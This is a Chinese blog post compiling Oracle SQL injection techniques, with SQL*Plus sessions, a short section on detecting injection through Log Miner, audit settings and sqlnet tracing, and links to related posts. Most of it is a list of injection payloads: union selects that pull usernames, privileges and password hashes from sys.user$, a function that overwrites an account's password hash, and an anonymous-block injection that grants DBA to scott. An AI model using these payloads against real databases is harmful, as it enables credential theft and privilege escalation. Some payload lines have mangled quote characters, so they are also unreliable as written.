oracle注射总结

原创 2004年10月24日 12:33:00
资料:http://www.petefinnigan.com/papers/detect.sql'
a'='a' or 1=1
SQL> exec get_cust('x'' union select username from all_users where ''x''=''x');
debug:select customer_phone from customers where customer_surname='x' union
select username from all_users where 'x'='x'
::AURORA$JIS$UTILITY$
::AURORA$ORB$UNAUTHENTICATED
::CTXSYS
::DBSNMP
::EMIL
::FRED

SQL> select log_mode from v$database;
SQL> select name,value from v$parameter
2 where name in('log_archive_start','log_archive_dest');
NAME
----------------------------------------------------------------
VALUE
--------------------------------------------------------------------------------
log_archive_start
TRUE
log_archive_dest
/export/home/u01/app/oracle/admin/emil/archive
SQL> select name,value from v$parameter
2 where name = 'transaction_auditing';
NAME
----------------------------------------------------------------
VALUE
--------------------------------------------------------------------------------
transaction_auditing
TRUE
Now execute the SQL injection attempt and then use Log Miner to see what is recorded. To make the analysis easier for this example, the archive log is saved before and after to ensure only this command is in the log:

SQL> connect sys as sysdba
Enter password:
Connected.
SQL> alter system archive log current;
System altered.
SQL>
SQL> connect dbsnmp/dbsnmp@emil
Connected.
SQL> set serveroutput on size 100000
SQL> exec get_cust('x'' union select username from all_users where ''x''=''x');
debug:select customer_phone from customers where customer_surname='x' union
select username from all_users where 'x'='x'
::AURORA$JIS$UTILITY$
::AURORA$ORB$UNAUTHENTICATED
::CTXSYS
::DBSNMP
::EMIL
<records snipped>
::SYS
::SYSTEM
::WKSYS
::ZULIA
PL/SQL procedure successfully completed.
SQL> connect sys as sysdba
Enter password:
Connected.
SQL> alter system archive log current;
System altered.
SQL>
First create the Log Miner dictionary:

SQL> set serveroutput on size 1000000
SQL> exec dbms_logmnr_d.build('logmnr.dat','/tmp');
LogMnr Dictionary Procedure started
LogMnr Dictionary File Opened
TABLE: OBJ$ recorded in LogMnr Dictionary File
TABLE: TAB$ recorded in LogMnr Dictionary File
TABLE: COL$ recorded in LogMnr Dictionary File
TABLE: TS$ recorded in LogMnr Dictionary File
<output snipped>
Procedure executed successfully - LogMnr Dictionary Created
PL/SQL procedure successfully completed.
SQL> select name
2 from v$archived_log
3 where completion_time=(select max(completion_time) from v$archived_log);
NAME
--------------------------------------------------------------------------------
/export/home/u01/app/oracle/admin/emil/archive/1_7.dbf
SQL>
Now load the archive log file into Log Miner:

SQL> exec dbms_logmnr.add_logfile('/export/home/u01/app/oracle/admin/emil/archive/1_7.dbf',sys.dbms_logmnr.NEW);
PL/SQL procedure successfully completed.
SQL> exec dbms_logmnr.start_logmnr(dictFileName => '/tmp/logmnr.dat');
PL/SQL procedure successfully completed.
SQL>
Finally, search the results:

SQL> select scn,username,timestamp,sql_redo
2 from v$logmnr_contents
SQL>
<snipped>
SCN USERNAME TIMESTAMP SQL_REDO
---------- --------------- --------- ------------------------------
253533 DBSNMP 16-JUN-03 set transaction read write;
253533 DBSNMP 16-JUN-03 update "SYS"."AUD$" set
"ACTION#" = '101',
"RETURNCODE" = '0',
"LOGOFF$LREAD" = '228',
"LOGOFF$PREAD" = '0',
"LOGOFF$LWRITE" = '10',
"LOGOFF$DEAD" = '0',
"LOGOFF$TIME" =
TO_DATE('16-JUN-2003
12:16:12', 'DD-MON-YYYY
SCN USERNAME TIMESTAMP SQL_REDO
---------- --------------- --------- ------------------------------
HH24:MI:SS'), "SESSIONCPU" =
'5' where "ACTION#" = '100'
and "RETURNCODE" = '0' and
"LOGOFF$LREAD" IS NULL and
"LOGOFF$PREAD" IS NULL and
"LOGOFF$LWRITE" IS NULL and
"LOGOFF$DEAD" IS NULL and
"LOGOFF$TIME" IS NULL and
"SESSIONCPU" IS NULL and ROWID
= 'AAAABiAABAAAAEWAAX';

SCN USERNAME TIMESTAMP SQL_REDO
---------- --------------- --------- ------------------------------
253534 DBSNMP 16-JUN-03 commit;
<snipped output>
SQL> select p.spid,s.username
2 from v$session s,v$process p
3 where s.paddr=p.addr;
SPID USERNAME
--------- ------------------------------
<records snipped>
616 DBSNMP
556 SYSTEM
9 rows selected.
SQL>
To enable trace simply add the following lines to the $ORACLE_HOME/network/admin/sqlnet.ora file:

TRACE_FILE_SERVER=pf_trace.trc
TRACE_DIRECTORY_SERVER=/tmp
TRACE_LEVEL_SERVER=SUPPORT
SQL> exec get_cust('x'' union select username from all_users where ''x''=''x');
PL/SQL procedure successfully completed.
exec get_cust2('x'' or ''x''=''x'' --');
exec get_cust('x'' union select sys.login_user from sys.dual where ''x''=''x');
exec get_cust('x'' union select to_char(sysdate) from sys.dual@plsq where ''x''=''x');
exec get_cust('x'' union select 1,''Y'' from sys.dual where ''x''=''x');
exec get_cust('x'' union select object_name,object_type,''x'' from user_objects where ''x''=''x');
exec get_cust('x'' union select granted_role,admin_option,default_role from user_role_privs where ''x''=''x');
exec get_cust('x'' union select privilege,admin_option,''X'' from user_sys_privs where ''x''=''x');
exec get_cust_bind('Clark');
exec get_cust_bind('x'' union select username from all_users where ''x''=''x');

select customer_phone from customers where customer_surname='x' select username from all_users where 'x'='x' 

select customer_phone from customers where customer_surname='x' union select username from all_users where 'x'='x' 
select customer_phone from customers where customer_surname='x' or exists (select 1 from   
sys.dual) and 'x'='x'
select customer_phone from customers where customer_surname='x' or 'x'='x'

select customer_phone from customers where customer_surname='x' or 'x'='x' --' and      
customer_type=1
select customer_phone from customers where customer_surname='x' union select sys.login_user from sys.dual where 'x'='x' 
select customer_phone from customers where customer_surname='x' union select to_char(sysdate) from sys.dual@plsq where 'x'='x' 
select customer_phone,customer_forname,customer_surname from customers where         
customer_surname='x' union select 1,'Y' from sys.dual where 'x'='x'

select customer_phone,customer_forname,customer_surname from customers where        customer_surname='x' union select object_name,object_type,'x' from user_objects where 'x'='x'    
select customer_phone,customer_forname,customer_surname from customers where         
customer_surname='x' union select granted_role,admin_option,default_role from user_role_privs where 'x'='x' 
select customer_phone,customer_forname,customer_surname from customers where         
customer_surname='x' union select privilege,admin_option,'X' from user_sys_privs where 'x'='x' 
select customer_phone from customers where customer_surname=:surname::999444888  

select customer_phone from customers where customer_surname=:surname  

exec get_cust('x'' union select username from all_users where ''x''=''x')
exec dbms_logmnr.add_logfile('/export/home/u01/app/oracle/admin/emil/archive/1_7.dbf',sys.dbms_logmnr.NEW)
exec dbms_logmnr.start_logmnr(dictFileName => '/tmp/logmnr.dat')
exec get_cust('x'' union select username from all_users where ''x''=''x')
exec get_cust('x'' union select username from all_users where ''x''=''x')
exec get_cust('x'' union select username from all_users where ''x''=''x')

exec sys.list_libraries(‘sys’);
exec sys.list_libraries(‘foo’’union select password from sys.user$--);
select sys.select_count(‘sys’)from dual;
select sys.select_count(‘sys’ union select password from sys.user$where name=”sys”—‘)from dual;
select sys.select_count(‘sys”union select user#from sys.user$ where name=”sys”—‘)from dual; 
select sys.select_count(‘sys’’and object name=(select password from sys.user$where name=”sys”—‘)from dual;
select sys.select_count(‘foo”||scott.get_it()—‘)from dual;
call exec dbms_output.put_line(‘output’)
exec sys.new_emp(‘foo”||scott.get_it)—‘);
create or replace function rstpwd return
 varchar2 authid current_user is
mystmt varchar2(200);
begin
mystmt:=’update sys.user$set password=
 “fe0e8ce7c92504e9”where name=”anonymous”’;
execute immediate mystmt;
return ‘foo’;
end
/
exec sys.new_emp(‘p”||scott.rstpwd)—‘);

exec sys.anon_block(‘foobar’);
exec sys.anon_block(‘f”);execute immediate “grant dba to scott”; end;--‘);

Mysql5注射技巧总结

flyh4t@126.com文章已经发表在《黑客手册》,转载请署名版权Mysql5和之前的版本有很多不同的地方,灵活的运用其特性可以在入侵的时候省掉很多麻烦。我试图在本文把在《渗透周杰伦官方网站》中没...
  • cnbird2008
  • cnbird2008
  • 2008年01月22日 14:26
  • 425

SQL注射总结(一)

作者:岁月联盟 猪猪Sql注射总结(早源于or1=1) 最重要的表名:select * from sysobjectssysobjects ncsysobjectssysindexes tsysind...
  • szbenxu
  • szbenxu
  • 2005年02月27日 02:15
  • 529

oracle 注射

作者:不详来源:不详判断是否为Oralce数据库:And 0猜解字段数量:使用order by 或者group by逐个提交数字 知道回显错误页面列出字段数目 比如6个字段数目and 1=1 null...
  • god_7z1
  • god_7z1
  • 2011年07月13日 21:17
  • 356

极简版 Java 依赖注射

最新完整代码在:https://gitee.com/sp42/ajaxjs-base/tree/master/src/main/com/ajaxjs/ioc。承蒙《自己动手写一个ioc工具》一文指点,...
  • zhangxin09
  • zhangxin09
  • 2015年01月26日 21:44
  • 2736

LKM 注射 二

----[ 3.3 - 插入代码  不断发展的技术使得替换函数并且执行变成了可能,不过这还不是特别有趣。如果我们能在已有的模块中插入外来的代码就更好了。有一种方法可以 *轻松* 做到这点--使用ld ...
  • iiprogram
  • iiprogram
  • 2008年05月29日 16:04
  • 808

步进电机驱动微型输注仪器的一种新方式

步进电机驱动微型输注仪器的一种新方式1、引言      步进电机是一种将数字信号直接转换成角位移或线位移的控制驱动元件,具有快速起动和停止的特点。其机械位移和转速分别与输入脉冲的数量和脉冲频率成正比。...
  • Augusdi
  • Augusdi
  • 2014年05月28日 15:58
  • 1819

Oracle web环境注射技术

Oracle web环境注射技术
  • cnbird2008
  • cnbird2008
  • 2011年01月05日 17:58
  • 512

Oracle知识点总结(一)

体系结构: 数据库的体系结构是指数据库的组成、工作过程与原理,以及数据在数据库中的组织与管理机制。 体系结构包括:实例(instence),数据库文件(database),用户进程(user pr...
  • chuyuqing
  • chuyuqing
  • 2013年04月07日 21:47
  • 4426

SQL注射总结(2)

例如:sp_addextendedproc xp_webserver, c:/temp/xp_foo.dllexec xp_webserversp_dropextendedproc xp_webser...
  • metababy
  • metababy
  • 2005年12月29日 10:50
  • 996

SQL注射总结

Sql注射总结(早源于or1=1) 最重要的表名:select * from sysobjectssysobjects ncsysobjectssysindexes tsysindexessyscol...
  • charry922
  • charry922
  • 2006年08月29日 09:10
  • 658
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:oracle注射总结
举报原因:
原因补充:

(最多只允许输入30个字)